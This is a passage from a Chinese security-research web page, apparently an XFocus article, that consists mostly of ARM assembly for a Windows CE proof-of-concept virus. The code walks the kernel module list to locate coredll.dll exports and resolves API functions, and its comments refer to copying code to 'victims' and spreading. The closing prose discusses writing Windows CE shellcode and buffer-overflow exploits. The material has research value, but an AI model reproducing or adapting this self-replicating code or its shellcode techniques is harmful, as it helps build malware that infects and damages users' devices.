📄 747.html
字号:
cmpeq r3, #0<br />
moveq pc, lr<br />
<br />
cmp r2, r3<br />
beq wstrcmp_iterate<br />
<br />
mov pc, lr<br />
ENDP<br />
<br />
; output:<br />
; r0 - coredll base addr<br />
; r1 - export section addr<br />
get_export_section PROC<br />
stmdb sp!, {r4 - r9, lr}<br />
<br />
ldr r4, =0xffffc800 ; KDataStruct<br />
ldr r5, =0x324 ; aInfo[KINX_MODULES]<br />
<br />
add r5, r4, r5<br />
ldr r5, [r5]<br />
<br />
; r5 now points to first module<br />
<br />
mov r6, r5<br />
mov r7, #0<br />
<br />
iterate<br />
ldr r0, [r6, #8] ; get dll name<br />
adr r1, coredll<br />
bl wstrcmp ; compare with coredll.dll<br />
<br />
ldreq r7, [r6, #0x7c] ; get dll base<br />
ldreq r8, [r6, #0x8c] ; get export section rva<br />
<br />
add r9, r7, r8<br />
beq got_coredllbase ; is it what we're looking for?<br />
<br />
ldr r6, [r6, #4]<br />
cmp r6, #0<br />
cmpne r6, r5<br />
bne iterate ; nope, go on<br />
<br />
got_coredllbase<br />
mov r0, r7<br />
add r1, r8, r7 ; yep, we've got imagebase<br />
; and export section pointer<br />
<br />
ldmia sp!, {r4 - r9, pc}<br />
ENDP<br />
<br />
coredll DCB "c", 0x0, "o", 0x0, "r", 0x0, "e", 0x0, "d", 0x0, "l", 0x0, "l", 0x0<br />
DCB ".", 0x0, "d", 0x0, "l", 0x0, "l", 0x0, 0x0, 0x0<br />
<br />
; basic string compare<br />
bstrcmp PROC<br />
bstrcmp_iterate<br />
ldrb r9, [r7], #1<br />
ldrb r10, [r8], #1<br />
<br />
cmp r9, #0<br />
cmpeq r10, #0<br />
moveq pc, lr<br />
<br />
cmp r9, r10<br />
beq bstrcmp_iterate<br />
<br />
mov pc, lr<br />
ENDP<br />
<br />
; r0 - coredll base addr<br />
; r1 - export section addr<br />
; r2 - function name addr<br />
lookup_imports PROC<br />
stmdb sp!, {r4 - r6, lr}<br />
<br />
ldr r4, [r1, #0x20] ; AddressOfNames<br />
add r4, r4, r0<br />
<br />
mov r6, #0 ; counter<br />
lookup_imports_iterate<br />
ldr r7, [r4], #4<br />
add r7, r7, r0 ; function name ponter<br />
mov r8, r2 ; find function name<br />
<br />
bl bstrcmp<br />
<br />
addne r6, r6, #1<br />
bne lookup_imports_iterate<br />
<br />
ldr r5, [r1, #0x24] ; AddressOfNameOrdinals<br />
add r5, r5, r0<br />
add r6, r6, r6<br />
ldrh r9, [r5, r6] ; Ordinals<br />
ldr r5, [r1, #0x1c] ; AddressOfFunctions<br />
add r5, r5, r0<br />
ldr r9, [r5, r9, LSL #2] ; function address rva<br />
add r9, r9, r0 ; function address<br />
<br />
ldmia sp!, {r4 - r6, pc}<br />
ENDP<br />
<br />
mb DCB "MessageBoxW", 0x0<br />
tp DCB "TerminateProcess", 0x0,0x0,0x0,0x0<br />
ALIGN 4<br />
<br />
; Dear User, am I allowed to spread?<br />
<br />
text DCB "H", 0x0, "e", 0x0, "l", 0x0, "l", 0x0, "o", 0x0, " ", 0x0<br />
DCB "W", 0x0, "i", 0x0, "n", 0x0, "C", 0x0, "E", 0x0, "!", 0x0<br />
DCB 0x0, 0x0, 0x0, 0x0<br />
ALIGN 4<br />
<br />
LTORG<br />
test_end<br />
<br />
; the code after test_end doesn't get copied to victims<br />
<br />
WinMainCRTStartup PROC<br />
b test_code_start<br />
ENDP<br />
<br />
; first generation entry point<br />
host_entry<br />
mvn r0, #0<br />
mov pc, lr<br />
END<br />
<br />
代码还是比较傻,如果能把Win32 shellcode的hash引入可能代码会更好看一些。Ratter/29A在WinCE4.Dust虽然还只是个概念病毒,但是病毒的基本技术它都已经具备了,所以不难相信不久就会有更多的Windows CE病毒。如果作者不怀好意,用KernelIoControl把系统引导入BootLoader模式,那么对于很多非专业的用户来说无疑象遭遇CIH病毒一般可恶。<br />
<br />
通过上面的代码不难相信很容易就能写出Windows CE下的shellcode,Seth Fogie在最近的defcon等会议上提到Windows CE下缓冲区溢出,随着PDA网络化程度越来越高,以及和手机的结合,相信Windows CE下的缓冲区溢出不久就会流行起来。不过Windows CE下缓冲区溢出可能会遭遇几个问题:<br />
<br />
1. Windows CE是一个Unicode环境,它可能会把用户输入的数据转成Unicode格式。<br />
2. 要在Windows CE上写解码shellcode可能会有些问题,首先arm没有xor指令,另外还有可能遭遇指令缓存的问题。不是很清楚Windows CE对软中断指令swi怎么支持。<br />
3. 不同厂商不同版本的PDA可能存在这样那样的差异,导致攻击程序无法通用。<br />
<br />
不过Windows CE现在已经发展的很成熟了,可以进来看看。<br />
<br />
--[ 4. 参考资料:<br />
<br />
1. ARM ASSEMBLER<br />
<a href='http://www.heyrick.co.uk/assembler/index.html' target='_blank'>http://www.heyrick.co.uk/assembler/index.html</a><br />
2. misc notes on the xda and windows ce<br />
<a href='http://www.xs4all.nl/~itsme/projects/xda/' target='_blank'>http://www.xs4all.nl/~itsme/projects/xda/</a><br />
3. Windows CE 3.0 Source Code<br />
<a href='http://msdn.microsoft.com/embedded/prevver/ce3/download/source/default.aspx' target='_blank'>http://msdn.microsoft.com/embedded/prevver/ce3/download/source/default.aspx</a><br />
4. Details Emerge on the First Windows Mobile Virus<br />
<a href='http://www.informit.com/articles/article.asp?p=337071' target='_blank'>http://www.informit.com/articles/article.asp?p=337071</a><br />
<br />
历史记录:<br />
<br />
1. 2004.11.09修正搜索API代码的一个错误。<br />
<br />
广告时间:<br />
<br />
本文将进一步扩充整理,作为XFocus Security Team的《网络渗透技术》(暂定名)一书中《Windows CE平台缓冲区溢出利用技术》一节。XFocus Security Team将在<a href='https://www.xfocus.net/bbs/index.php?act=ST&f=2&t=42618' target='_blank'>安全焦点技术研究版</a>对本书做全面技术支持。
</td>
</tr>
</table>
<div class="footer">
Copyright © 1998-2003 XFOCUS Team. All Rights Reserved
</div>
</body>
</html>⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -